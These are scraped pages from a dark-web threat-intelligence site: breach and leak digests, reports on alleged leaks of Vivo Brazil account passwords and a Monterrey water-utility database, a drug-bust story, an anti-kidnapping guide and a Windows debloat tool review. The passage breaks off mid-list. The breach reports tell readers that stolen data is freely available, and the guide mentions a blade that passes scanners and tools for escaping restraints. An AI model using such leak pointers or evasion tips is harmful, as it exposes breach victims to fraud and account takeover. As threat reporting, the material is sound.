IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts 💡 [What's Actually in an Anti-Kidnapping Kit and Why High-Risk Individuals Should Care](https://darkwebinformer.com/whats-actually-in-an-anti-kidnapping-kit-and-why-high-risk-individuals-should-care/) FREE 📰 [Williamson County Drug Bust Tied to Dark Web Investigation Following Overdose Death](https://darkwebinformer.com/williamson-county-drug-bust-tied-to-dark-web-investigation-following-overdose-death/) FREE ❗️ [Alleged Leak of 557,892 Vivo Brazil Customer Accounts by V For Vendetta Cyber Team](https://darkwebinformer.com/alleged-leak-of-557892-vivo-brazil-customer-accounts-by-v-for-vendetta-cyber-team/) FREE X/Twitter Updates ❗️ [Conquerors Electronic Army targeted the website of Israel Post](https://x.com/DarkWebInformer/status/2029936430575751648?s=20) ❗️ [Pathstone.com has suffered a data leakage at the hands of ShinyHunters](https://x.com/DarkWebInformer/status/2029939332627472892?s=20) ❗️ [SERVER KILLERS targeted multiple websites in Israel](https://x.com/DarkWebInformer/status/2029944840658600201?s=20) ❗️ [313 Team targeted the website of multiple Kuwaiti websites](https://x.com/DarkWebInformer/status/2029948812853125607?s=20) ❗️ [A threat actor is selling a large collection of cryptocurrency-related breach databases, comprising 100+ files from exchanges, wallets, DeFi platforms, and crypto services.](https://x.com/DarkWebInformer/status/2029952561457868933?s=20) ❗️ [A threat actor claims to be selling 338,000,000 Mail:Pass lines of emails and passwords from Gmail.](https://x.com/DarkWebInformer/status/2029954648040218736?s=20) ❗️ [A threat actor has allegedly leaked the database of Komiko.App, a popular AI NSFW video and image generation platform, affecting over 1,000,000 unique users.](https://x.com/DarkWebInformer/status/2029957755839127711?s=20) ❗️ [A threat actor has allegedly leaked the database of Success.com, a popular newsletter, article platform, and media brand focused on business, leadership, and personal growth. Over 141K unique users had their data leaked.](https://x.com/DarkWebInformer/status/2029968020232126750?s=20) 💡 [Akira victims now display on the ransomware feed.](https://x.com/DarkWebInformer/status/2029973675726745936?s=20) 💡 [Favihunter: Discover and monitor internet assets using favicon hashes across search engines.](https://x.com/DarkWebInformer/status/2029986318546083949?s=20) ❗️ [A threat Actor claims to be selling a zero-day exploit of CVE-2026-21533 for $220,000.](https://x.com/DarkWebInformer/status/2029988351894339644?s=20) ❗️ [A threat actor claims to be selling "Distributed Brute Force Cluster v1.0" for $50,000.](https://x.com/DarkWebInformer/status/2029993294126616745?s=20) ❗️ [PLAY Ransomware Claims 6 Victims](https://x.com/DarkWebInformer/status/2030018784883298378?s=20) ❗️ [Starpronto Prosperity Group, which claimed to be an academy offering financial education, investment, and leadership development programs has been seized by law enforcement.](https://x.com/DarkWebInformer/status/2030022203043909654?s=20) 💡 [These Domains Have Been Seized, that I teased multiple times last year, is being worked on again. This is likely the design I will end up using. There is hundreds of domains to add, once the design is final it will just be a matter of adding data.](https://x.com/DarkWebInformer/status/2030030290047873404?s=20) 💡 [On the Ransomware Feed, if you happen to see something like "Targeted by 2 Groups", click the Search button and it will show you the information of "Same/Similar Group" that may apply. Click the claim and it will provide you the information from the other group.](https://x.com/DarkWebInformer/status/2030039246287806800?s=20) 💡 [What a beautiful dashboard @whiteintel\_io](https://x.com/DarkWebInformer/status/2030041053370212855?s=20) 💡 [Entering the Dark Web...](https://x.com/DarkWebInformer/status/2030047400891388022?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Alleged Leak of 557,892 Vivo Brazil Customer Accounts by V For Vendetta Cyber Team URL: https://darkwebinformer.com/alleged-leak-of-557-892-vivo-brazil-customer-accounts-by-v-for-vendetta-cyber-team/ Last updated: 2026-03-06T19:06:23.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Leak of 557,892 Vivo Brazil Customer Accounts by V For Vendetta Cyber Team March 6, 2026 - 5:12:27 PM UTC ![Brazil](https://flagcdn.com/20x15/br.png)Brazil Telecommunications Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-06 17:12:27 UTC Threat Actor VFVCT (D2VY) Victim Country ![Brazil](https://flagcdn.com/20x15/br.png)Brazil Industry Telecommunications Victim Organization Vivo Brazil Victim Site vivo.com.br Category Data Leak Severity High Network Open Web Total Records 557,892 ## Incident Overview A threat actor operating under the handle VFVCT, with the individual attacker identified as D2VY from the V For Vendetta Cyber Team, has leaked 557,892 customer accounts allegedly belonging to Vivo Brazil, one of the country's largest telecommunications providers. The data was reportedly sourced from Brazil Telecom infrastructure and is available as a free download in CSV/LOG format. The leaked dataset covers recent activity spanning from 2023 to 2026 and includes email addresses, phone numbers, and passwords for Vivo Brazil customer accounts. The inclusion of plaintext or cracked passwords alongside contact information makes this a particularly high-risk exposure, as affected accounts could be vulnerable to credential stuffing, account takeovers, and targeted phishing campaigns. Redacted samples were posted in the listing to demonstrate the data's legitimacy. The listing was posted on March 6, 2026. ## Compromised Data Categories Email Addresses Phone Numbers Passwords ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing 557,892 Vivo Brazil customer accounts leaked by V For Vendetta Cyber Team](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/26589515415890859856.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/26589515415890859856.png) [![Download section for Vivo Brazil data leak](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/26589515415890859857.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/26589515415890859857.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Williamson County Drug Bust Tied to Dark Web Investigation Following Overdose Death URL: https://darkwebinformer.com/williamson-county-drug-bust-tied-to-dark-web-investigation-following-overdose-death/ Last updated: 2026-03-06T17:49:57.000Z Williamson County deputies arrested a Round Rock, Texas man last Wednesday after executing a search warrant that yielded a significant cache of illegal drugs, electronics, and a firearm. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/239785698723598723569872359687231.png) The search warrant, carried out on February 25 at a residence in the 700 block of David Curry Drive, stemmed from an ongoing investigation into the overdose death of a 77-year-old woman on February 4\. [According to the Sheriff's Office](https://www.kwtx.com/2026/03/03/overdose-death-investigation-leads-dark-web-drug-bust-round-rock-multiple-narcotics-seized/), the death, which they say was not fentanyl-related, led investigators to uncover a pipeline of illegal drugs being purchased through dark web marketplaces using cryptocurrency. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/239785698723598723569872359687232.png) At the residence, deputies seized the following: - 140 grams of methamphetamine - 8.4 grams of liquid LSD - 161 LSD tab dose units - 26 grams of psilocybin mushrooms - 5.1 grams of fentanyl - 1.2 grams of ketamine - Over 36 Xanax pills - 6.6 grams of testosterone - 0.7 grams of THC wax - 2.3 grams of marijuana - A handgun ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/239785698723598723569872359687233-2.png) Investigators also recovered more than 20 cell phones along with numerous hard drives, SD cards, thumb drives, laptops, USB drives, and what the Sheriff's Office described as hacking devices. Jeannot Robinson was arrested and is currently in the Williamson County Jail on a $100,000.00 bond. This investigation is currently ongoing. ### What's Actually in an Anti-Kidnapping Kit and Why High-Risk Individuals Should Care URL: https://darkwebinformer.com/whats-actually-in-an-anti-kidnapping-kit-and-why-high-risk-individuals-should-care/ Last updated: 2026-03-05T19:06:31.000Z Personal Security · OPSEC · Threat Intelligence # What's Actually in an Anti-Kidnapping Kit A Guide for High-Risk Individuals Most people associate kidnapping risk with war zones or cartel territory // somewhere far removed from their daily life. But for journalists covering organized crime, researchers who've made enemies on the dark web, corporate executives traveling abroad, or anyone who has been publicly doxxed, the threat is more real than they'd like to admit. An anti-kidnapping kit won't make you bulletproof, but it can mean the difference between a bad situation and a fatal one. ## Who Actually Needs One? Before diving into gear lists, it's worth being honest about who faces genuine kidnapping risk. Certain professions and situations carry statistically elevated exposure: - **Investigative journalists** covering cartels, dark web marketplaces, or political corruption - **Corporate executives** traveling to high-risk regions // Latin America, West Africa, parts of Southeast Asia - **OSINT researchers and threat intelligence professionals** whose work draws attention from criminal actors - **Aid workers and NGO staff** operating in conflict zones - **High-net-worth individuals** with public social media presence signaling wealth - **Anyone seriously doxxed** // home address, family info, and daily routine all exposed Risk Assessment If you fall into any of these categories, building a kit isn't paranoia // it's threat modeling. The goal is to reduce exposure before an incident, and improve survival odds if one occurs. Physical Layer ## The Physical Kit A good kit is layered, concealable, and built around the scenarios you're most likely to face. ### Escape & Restraint Tools Zip ties and improvised restraints are far more common than handcuffs in kidnapping situations. Restraint Escape Handcuff Shim Flat, concealable, works on most standard double-lock cuffs. Can be sewn into a belt or waistband. Cutting Tool Ceramic Razor Blade Non-metallic, passes through many scanners. Highly effective on zip ties, duct tape, and cord. Lock Bypass Bogota Pick Set Compact and dual-purpose. Useful for improvised entry/exit scenarios beyond restraint escape. Multi-Use Paracord (550) Improvised descent, securing gear, distraction. Keep 20–30ft coiled and accessible. ### Communication - **Burner phone** // pre-loaded with key contacts, kept separate from your primary device. If your main phone is taken, you still have a line out. - **Satellite communicator** (Garmin inReach or SPOT) // essential for remote travel where cellular is unreliable - **Printed emergency contact card** // laminated, sewn into clothing or hidden in a shoe. Phones die. Paper doesn't. ### Cash & Documents - **Cash in small denominations** in USD or EUR // split across wallet, hidden money belt, and shoe - **Photocopies of passport, visa, and insurance** stored separately from originals - **Emergency credit card** hidden from your main wallet // Wise or Revolut card specifically for this purpose ### Medical (Trauma) - **Tourniquet** (CAT or SOFTT-W) // non-negotiable for high-risk travel - **Hemostatic gauze** // QuikClot or Celox for severe bleeding control - **Basic trauma dressing and medical tape** - **Personal medications** // 72-hour supply minimum, in unlabeled containers if necessary Digital Layer ## The Digital Layer Most anti-kidnapping guides skip this entirely. For our audience, the digital layer may be just as critical as the physical one. ⏱ Dead Man's Switch Automatically alerts contacts if you don't check in on schedule. If you're taken and can't reach your phone, your network knows within hours // not days. Services like deadmansswitch.net send pre-written emails to designated contacts on missed check-ins. 🔑 Duress Codes A secondary PIN that silently alerts a contact or wipes your device when entered. Establish a verbal duress word with your emergency contact // a word you'd never use naturally that signals you're under coercion. 🔒 Encrypted Comms Signal (disappearing messages on), Briar for mesh communication without internet via Bluetooth/WiFi // effective if cellular is jammed or monitored. Wire as a team comms alternative. 📍 Covert Location Sharing Live location via Signal with a trusted contact. Covert GPS tracker (LandAirSea 54, AirTag in a hidden pocket) on your person. Establish explicit check-in windows: if I don't message by 21:00, escalate. 💾 Air-Gapped Backup Encrypted USB drive with critical contacts, emergency protocols, and key documents // stored separately from all your devices. If everything is taken, you still have a fallback. 🗺 Offline Maps Maps.me or OsmAnd downloaded before departure. Usable without any cellular connection. Keep a dedicated device with full offline coverage for your travel region. Pre-Travel ## Pre-Travel OPSEC The best anti-kidnapping kit is the one you never need. Good OPSEC before travel dramatically reduces your exposure: - **Don't announce travel plans on social media** // this applies especially to dates, locations, and who you're meeting - **Vary your routes and routines** // predictability is the enemy. Same route, same time, every day means you're doing a kidnapper's planning for them. - **Research your destination's threat landscape** // OSAC publishes country-specific security reports; STEP registers your travel with the nearest embassy - **Threat model your specific exposure** // are you at risk because of who you are, what you're carrying, or where you're going? The answer shapes your preparation. - **Inform a trusted contact of your full itinerary** // hotel address, meeting schedule, emergency contacts // before you leave If Taken ## If You're Taken This is a framework based on what crisis consultants and hostage negotiation professionals consistently say // not legal or tactical advice. 1. Establish your value alive. In most non-political kidnappings, the goal is ransom. Communicate calmly that your family or employer can pay. You're worth more unharmed. 2. Do not attempt escape immediately. The first 24 hours carry the highest risk of violence. Assess the situation before acting. Rushed escape attempts often escalate to lethal force. 3. Observe everything. Sounds, smells, distances traveled, languages spoken, number of captors. This information is critical to rescuers and negotiators. 4. Do not negotiate ransom yourself. Family or employers should contact a professional K&R consultant immediately, not engage directly. Untrained negotiation frequently escalates situations. 5. Comply with reasonable requests. Pride and resistance can be lethal. The goal is to survive until professional help arrives. Professional Resources ## K&R Insurance & Training For anyone operating in high-risk environments professionally, two resources are worth serious consideration: ### Kidnap & Ransom Insurance K&R insurance covers ransom payments, negotiation consultant fees, medical expenses, and legal costs. Major insurers // AIG, Hiscox, Chubb // all offer policies. For journalists or executives with regular high-risk travel, pricing it out is worth the conversation. ### HEFAT Training Hostile Environment and First Aid Training courses are designed for journalists, aid workers, and security professionals. They cover kidnap survival, trauma medicine, vehicle ambush response, and more. [OSAC](https://www.osac.gov) Overseas Security Advisory Council // country-specific threat reports [STEP Program](https://step.state.gov) U.S. State Dept // register your travel with the nearest embassy [Control Risks](https://www.controlrisks.com) K&R consulting, crisis response, and HEFAT training provider [AKE Group](https://www.akegroup.com) Hostile environment training specialists // HEFAT and beyond [Briar](https://briarproject.org) Mesh messaging // works without internet via Bluetooth/WiFi [Dead Man's Switch](https://deadmansswitch.net) Automated check-in and emergency alert service An anti-kidnapping kit isn't about living in fear // it's about refusing to be unprepared. The people who need this information most are often the ones who underestimate their own exposure. If your work puts you in the public eye, makes you enemies, or takes you to places where the rule of law is inconsistent, this is worth your time. // Stay safe out there. ### 790GB Database From Agua y Drenaje de Monterrey Leaked for Free Covering All Water Service Users in Nuevo León URL: https://darkwebinformer.com/790gb-database-from-agua-y-drenaje-de-monterrey-leaked-for-free-covering-all-water-service-users-in-nuevo-leon/ Last updated: 2026-03-04T19:41:23.000Z Dark Web Informer - Cyber Threat Intelligence # 790GB Database From Agua y Drenaje de Monterrey Leaked for Free Covering All Water Service Users in Nuevo León March 4, 2026 - 7:08:12 PM UTC ![Mexico](https://flagcdn.com/20x15/mx.png)Mexico Government / Utilities Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-04 19:08:12 UTC Threat Actor Eternal Victim Country ![Mexico](https://flagcdn.com/20x15/mx.png)Mexico Industry Government / Utilities Victim Organization Agua y Drenaje de Monterrey Victim Site sadm.gob.mx Category Data Leak Severity Critical Network Open Web Data Size 790GB+ ## Incident Overview A threat actor going by Eternal has leaked over 790GB of data from Servicios de Agua y Drenaje de Monterrey (AyD), the public water and drainage utility for the state of Nuevo León, Mexico. The actor claims the database covers all water service users in the region and has made it available as a free two-part download, stating they are releasing it to undercut resellers who have been selling their databases at inflated prices. The leaked data reportedly includes full names, physical addresses, water consumption records, and RFC (Registro Federal de Contribuyentes) tax identification numbers for customers across Nuevo León. Given that AyD is the sole water utility for the state, the scope of this leak could potentially affect millions of residents and businesses. The threat actor also included a direct message to the Nuevo León government, warning that they still possess additional databases from government systems and threatening further releases. They also directed a warning at resellers, stating they intend to make all of their databases public if reselling activity continues. ## Compromised Data Categories Full Names Physical Addresses Water Consumption Data RFC Tax Identification Numbers ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing 790GB Agua y Drenaje de Monterrey database leaked for free](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/67764302716235632253.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/67764302716235632253.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Win11Debloat: A 40k-Star PowerShell Script for Stripping Bloatware, Telemetry, and AI Features from Windows URL: https://darkwebinformer.com/win11debloat-a-40k-star-powershell-script-for-stripping-bloatware-telemetry-and-ai-features-from-windows/ Last updated: 2026-03-04T14:56:08.000Z Tool Spotlight Windows Open Source Mar 04, 2026 # Win11Debloat: A 40k-Star PowerShell Script for Stripping Bloatware, Telemetry, and AI Features from Windows A lightweight PowerShell script that removes pre-installed bloatware, disables telemetry and tracking, kills Copilot and Recall, and cleans up the Windows 10/11 interface. One command, no installation required. 40.5k stars and 15 releases say the demand is real. Raphire / Win11Debloat A simple, lightweight PowerShell script to remove pre-installed apps, disable telemetry, as well as perform various other changes to customize, declutter and improve your Windows experience. PowerShell 99% Batchfile 1% ★ 40.5k stars MIT 1.6k forks 344 commits 23 contributors A fresh Windows installation in 2026 comes with Copilot, Recall, Click to Do, Bing web search baked into the Start menu, telemetry phoning home, widgets on the taskbar, ads in the Settings app, Candy Crush in the Start menu, and a collection of pre-installed apps that most people never asked for. Microsoft continues to add features that blur the line between operating system and advertising platform, and users continue to look for ways to undo it. **Win11Debloat** is the most popular open-source answer to this problem. It's a single PowerShell script that strips out bloatware, disables telemetry, removes AI features, and cleans up the interface — all through an interactive menu or command-line parameters. No installation, no dependencies beyond PowerShell, fully reversible. At 40.5k stars, it's one of the highest-starred Windows utility repos on GitHub. [![Win11Debloat System Tweaks interface showing categorized settings for Privacy, AI, Appearance, System, File Explorer, Start Menu, Taskbar, and more](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/Win11Debloat_menu.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/Win11Debloat%5Fmenu.png) ## // What It Does 🗑️ Bloatware Removal Removes 60+ pre-installed Microsoft and third-party apps: Clipchamp, Solitaire, Teams, Cortana, Spotify, Netflix, Candy Crush, TikTok, Instagram, and more. 🔒 Telemetry & Tracking Disables telemetry, diagnostic data, activity history, app-launch tracking, targeted ads, and tips/suggestions/ads across Windows and Edge. 🤖 AI & Copilot Removal Disables and removes Copilot, Windows Recall, Click to Do, Bing AI in search, and AI features in Edge, Paint, and Notepad. 🎨 Interface Cleanup Taskbar alignment, old context menu restore, File Explorer tweaks, widget removal, search box customization, dark mode, and more. ## // How to Run It The quickest method is a single PowerShell command that downloads and runs the script automatically: Open PowerShell (admin) → Paste one-liner → Interactive menu → Select options → Done Alternatively, download the ZIP from the releases page and double-click `Run.bat`. For automation and deployment, the script supports command-line parameters: `-RunDefaults` applies recommended settings and removes the default app selection, while `-RunDefaultsLite` applies the same settings without removing any apps. Individual features can be toggled via parameters for fully unattended operation. ## // Feature Breakdown | Category | What It Covers | | --------------- | -------------------------------------------------------------------------------------------- | | App Removal | 60+ Microsoft and third-party apps, customizable selection, start menu pin clearing | | Telemetry | Diagnostic data, activity history, app-launch tracking, targeted ads, Windows Spotlight | | AI / Copilot | Copilot, Recall, Click to Do, Bing AI in search, Cortana, AI in Edge/Paint/Notepad | | Taskbar | Left alignment, button labels, search icon, taskview, widgets, End Task option | | File Explorer | Default location, hidden files, extensions, Gallery/Home removal, OneDrive/3D Objects hiding | | Personalization | Dark mode, disable animations, mouse acceleration off, sticky keys off, old context menu | | Start Menu | Recommended section, Phone Link integration | | Other | Xbox Game Bar, Fast Start-up, Modern Standby network drain | ## // What It Doesn't Remove (by Default) 🛡️ Safe Defaults The script is careful about what it touches by default. Apps like Calculator, Camera, Photos, Notepad, Terminal, Paint, Microsoft Store, Phone Link, and gaming-related Xbox components are preserved unless you explicitly select them. The Microsoft Store in particular cannot be reinstalled if removed. This is an important detail that separates Win11Debloat from more aggressive debloating tools. The default removal list targets genuinely unwanted apps (Candy Crush, Solitaire, Clipchamp, defunct Bing apps, third-party promotional installs) while leaving functional system apps alone. Users can opt into removing additional apps through the interactive menu or custom app lists. ## // Advanced / Enterprise Features Beyond consumer use, the script includes features for sysadmins and deployment scenarios. **Sysprep mode** applies changes to the Windows Default user profile, so all new users on the machine inherit the debloated settings automatically. You can also apply changes to a different user account instead of the currently logged-in one. Combined with the command-line parameters for unattended operation, this makes Win11Debloat viable for imaging workflows and fleet deployments. ## // Reversibility All changes made by Win11Debloat can be reverted. Registry tweaks are standard key modifications that can be undone, and almost all removed apps can be reinstalled from the Microsoft Store (with the exception of the Microsoft Store itself and Xbox Speech-to-Text Overlay). The project wiki includes a full guide on reverting changes. This reversibility lowers the risk significantly compared to tools that make irreversible system modifications. ## // Considerations ⚠️ Use at Your Own Risk While the script is designed not to break OS functionality, modifying system settings and removing pre-installed apps always carries risk. Test on non-production machines first, and be aware that Windows updates may re-enable some settings or reinstall some apps. **Windows updates can undo changes.** Major Windows feature updates have a history of re-enabling telemetry settings, reinstalling removed apps, and resetting interface customizations. You may need to re-run the script after significant updates. This isn't a Win11Debloat limitation — it's a Windows behavior. **Not a security hardening tool.** Win11Debloat focuses on bloatware removal, privacy settings, and interface cleanup. It doesn't harden the OS against attacks, configure firewalls, or implement security baselines. For enterprise security hardening, look at tools like Microsoft Security Compliance Toolkit or CIS Benchmarks. **Some removals have dependencies.** A few apps that can be optionally removed have subtle dependencies. The Xbox UI framework (`Xbox.TCUI`) is required by the Microsoft Store and some games. The Get Help app is needed for certain Windows 11 troubleshooters. The script documents these relationships, but users should read the descriptions before removing optional apps. **PowerShell execution policy.** Running the script requires either administrator privileges to execute unsigned PowerShell scripts, or temporarily setting the execution policy to Unrestricted. The one-liner method handles this automatically, but the manual method requires `Set-ExecutionPolicy Unrestricted -Scope Process`. This is standard for PowerShell scripts but worth noting for security-conscious users. ## // Bottom Line Win11Debloat does exactly what its name says, and it does it well. The interactive menu makes it accessible to non-technical users, the command-line parameters make it automatable for sysadmins, and the safe defaults mean you're unlikely to break anything if you just run it with the recommended settings. The AI/Copilot removal features are particularly timely as Microsoft continues to push these features more aggressively with each update. With 40.5k stars, 15 releases, and active maintenance through late 2025, it's the most battle-tested debloating script in the Windows ecosystem. If you've ever spent 30 minutes after a fresh Windows install manually uninstalling Candy Crush, disabling Bing search, and hiding widgets, Win11Debloat does all of that in one command. [ GitHub Repository](https://github.com/Raphire/Win11Debloat) [ Wiki & Documentation](https://github.com/Raphire/Win11Debloat/wiki/) Win11Debloat modifies Windows system settings and removes pre-installed applications. While all changes are reversible, use at your own risk. Always test on non-production machines first. ### Daily Dose of Dark Web Informer - March 3rd, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-3rd-2026/ Last updated: 2026-03-03T23:50:04.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts 💡 [Ransomware Groups](https://darkwebinformer.com/ransomware-groups/) PRO/ELITE 💡 [Ransomware Feed 2.0 - What's New](https://darkwebinformer.com/ransomware-feed-2-0-whats-new/) FREE ❗️ [Shiraume Hospital Patient Data Allegedly Leaked With Full Medical Records and PII](https://darkwebinformer.com/shiraume-hospital-patient-data-allegedly-leaked-with-full-medical-records-and-pii/) FREE ❗️ [OptimizerAI Database Leaked With 118,000 User Records and 1.1 Million AI Generated Sounds](https://darkwebinformer.com/optimizerai-database-leaked-with-118000-user-records-and-1-1-million-ai-generated-sounds/) FREE X/Twitter Updates ❗️ [A threat actor on a hacking forum has allegedly leaked data from Universidad Surcolombiana (usco.edu.co), a public university in Neiva, Colombia.](https://x.com/DarkWebInformer/status/2028836677066563910?s=20) ❗️ [A threat actor has allegedly leaked a database from MTN Irancell, one of Iran's largest mobile telecommunications operators.](https://x.com/DarkWebInformer/status/2028841665218183401?s=20) ❗️ [A threat actor has allegedly leaked patient data from Hospital General de Medellín Luz Castro de Gutiérrez E.S.E., a major public hospital in Medellín, Colombia.](https://x.com/DarkWebInformer/status/2028847256934216158?s=20) ❗️ [A threat actor is advertising a new macOS RAT/Stealer called "notnullOSx" on a hacking forum, positioning it as a more robust alternative to existing AppleScript-based macOS malware.](https://x.com/DarkWebInformer/status/2028853454936986076?s=20) 💡 [You're telling me there isn't an unlimited gold hack in Roblox?](https://x.com/DarkWebInformer/status/2028854642772193337?s=20) ❗️ [A threat actor claims to have breached Eholo Health (eholo.health), a Spanish software platform for psychologists and psychological centers used by over 10,000 professionals for patient management, billing, scheduling, and clinical history handling.](https://x.com/DarkWebInformer/status/2028869418147627265?s=20) ❗️ [WoFlow, Inc. has been given a final warning by ShinyHunters](https://x.com/DarkWebInformer/status/2028870507240550573?s=20) ❗️ [Conquerors Electronic Army targeted the website of Noam](https://x.com/DarkWebInformer/status/2028874017399017599?s=20) 💡 [I have taken down the old Ransomware Feed page and groups directory. It is being replaced with the new Ransomware Feed/Groups page. I will update you once both are available.](https://x.com/DarkWebInformer/status/2028880579949740532?s=20) 💡 [The new Ransomware feed and groups pages are now available.](https://x.com/DarkWebInformer/status/2028895224781558137?s=20) ❗️ [A threat actor has allegedly leaked the database of futurizesistemas.com.br, a Brazilian electronic invoice (Nota Fiscal de Serviços Eletrônica - NFS-e) platform, containing 6.7 million records.](https://x.com/DarkWebInformer/status/2028909282414997829?s=20) ❗️ [A threat actor has allegedly leaked data from the Rishon LeZion Municipal Corporation, a local government body in Israel's fourth-largest city, founded in 1882.](https://x.com/DarkWebInformer/status/2028911064276992098?s=20) ❗️ [A threat actor operating under a Telegram channel named "لواء محمد ﷺ – السيادة السيبرانية" (Mohammed Brigade – Cyber Sovereignty) has allegedly leaked a dataset described as "Database Military Israel."](https://x.com/DarkWebInformer/status/2028913455428767776?s=20) ❗️ [MAJOR BREACH: A threat actor claims to have breached LexisNexis, the legal information division of RELX Group ($80B company, $9.7B revenue, \~16,700 employees), exfiltrating 2.04 GB of structured data from their AWS infrastructure.](https://x.com/DarkWebInformer/status/2028862384765341767?s=20) ❗️ [Moroccon Black Cyber Army targeted the website of Israel Natural Gas Lines Ltd.](https://x.com/DarkWebInformer/status/2028916746044772383?s=20) ❗️ [A threat actor claims to be selling the database of Be-bunk, a French payment services company offering accounts, Visa cards, and a mobile app for managing daily payments, targeting French overseas communities.](https://x.com/DarkWebInformer/status/2028923099047973370?s=20) ❗️ [Alleged leak of Iranian police forces personal data](https://x.com/DarkWebInformer/status/2028926215281664479?s=20) ❗️ [A threat actor has allegedly leaked the database of reservations.mexitravels.com, a Mexican travel reservations 